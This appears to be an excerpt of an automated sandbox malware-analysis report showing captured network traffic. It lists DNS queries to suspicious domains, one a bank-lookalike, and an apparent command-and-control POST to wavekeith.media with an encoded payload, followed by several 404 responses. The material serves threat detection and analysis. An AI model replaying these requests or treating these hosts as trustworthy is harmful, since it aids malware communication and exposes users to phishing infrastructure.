Source: global traffic | DNS traffic detected: DNS query: www.72422.pink
Source: global traffic | DNS traffic detected: DNS query: www.credit-agricole.pics
Source: global traffic | DNS traffic detected: DNS query: www.wavekeith.media
Source: global traffic | DNS traffic detected: DNS query: www.lifway.life
Source: global traffic | DNS traffic detected: DNS query: www.zthzzyg.top
Source: global traffic | DNS traffic detected: DNS query: www.rvtapp.com
Source: global traffic | DNS traffic detected: DNS query: www.shangaccurate.shop
Source: global traffic | DNS traffic detected: DNS query: www.computational360.xyz
Source: global traffic | DNS traffic detected: DNS query: www.royalbond.xyz
Source: global traffic | DNS traffic detected: DNS query: www.conegame.biz
Source: global traffic | DNS traffic detected: DNS query: www.venturegioballng.fun
Source: global traffic | DNS traffic detected: DNS query: www.click68vp.store
Source: global traffic | DNS traffic detected: DNS query: www.genericagi.xyz
Source: global traffic | DNS traffic detected: DNS query: www.kissjav.pics
Source: global traffic | DNS traffic detected: DNS query: www.031233793.xyz
                        Source: unknownHTTP traffic detected: POST /c6g4/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.wavekeith.mediaContent-Length: 202Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Connection: closeOrigin: http://www.wavekeith.mediaReferer: http://www.wavekeith.media/c6g4/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)Data Raw: 58 4e 52 50 46 3d 63 50 78 73 52 64 6f 75 4d 48 36 6f 6c 78 69 42 4c 45 77 52 74 4b 67 76 4b 45 30 41 32 50 32 39 37 70 41 4a 66 39 31 66 55 70 61 4a 65 79 31 47 65 69 45 73 5a 57 36 38 55 33 48 74 78 78 62 42 6d 50 37 2f 76 6b 72 73 74 45 2f 6e 2f 52 6b 63 74 6e 51 65 6e 4d 41 4f 77 42 45 6b 4a 68 48 2b 51 41 55 45 71 31 42 77 65 54 47 63 33 47 76 2f 4c 34 30 68 6a 5a 77 75 43 78 58 63 78 31 72 76 7a 45 43 37 2b 6e 33 30 6b 66 44 6b 4d 2b 55 71 79 68 55 72 4c 62 45 7a 63 39 70 68 78 6d 30 6f 62 49 6d 4b 6e 30 63 65 77 45 4f 47 67 4c 4e 71 66 73 49 69 55 78 45 44 67 33 37 34 69 6d 65 67 4b 67 3d 3d Data Ascii: XNRPF=cPxsRdouMH6olxiBLEwRtKgvKE0A2P297pAJf91fUpaJey1GeiEsZW68U3HtxxbBmP7/vkrstE/n/RkctnQenMAOwBEkJhH+QAUEq1BweTGc3Gv/L40hjZwuCxXcx1rvzEC7+n30kfDkM+UqyhUrLbEzc9phxm0obImKn0cewEOGgLNqfsIiUxEDg374imegKg==
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 14 Apr 2025 21:12:09 GMTContent-Type: text/plainContent-Length: 0Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:12:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:12:49 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:12:52 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:12:54 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 14 Apr 2025 21:13:01 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 
Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 14 Apr 2025 21:13:04 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 
Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 14 Apr 2025 21:13:06 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 
Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 14 Apr 2025 21:13:09 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 
Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:13:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DWv%2BjlC3btC1wTHTC2nGBUfEro64DnjJGlDQPNwCrdH%2BoZb50xnyni2m6h39HaPsnRPG%2B8yp7aSLfrtYkEYzgVMwr0tlZY8D6A%2B0fGBbztckmg36Vky1PhoL8UM9BaVqyl3KzY84%2BfWR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 930634f269c36de0-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=126204&min_rtt=126204&rtt_var=63102&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=736&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 14 Apr 2025 21:13:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FT%2FZB2yqCyONE9tluKQ69SBbikRVLudu1bydVl%2BpqUJSN2nCZmF3mrJF1sbGAQ%2Fn1Yfs09LJhhLOkw9M9VNlFfeUjGCLEowd1prevp3nBnimQh4SuoHHK3PTGqsZKJTIilUbAuq%2FlEXT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9306350319168dee-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=126391&min_rtt=126391&rtt_var=63195&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=756&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
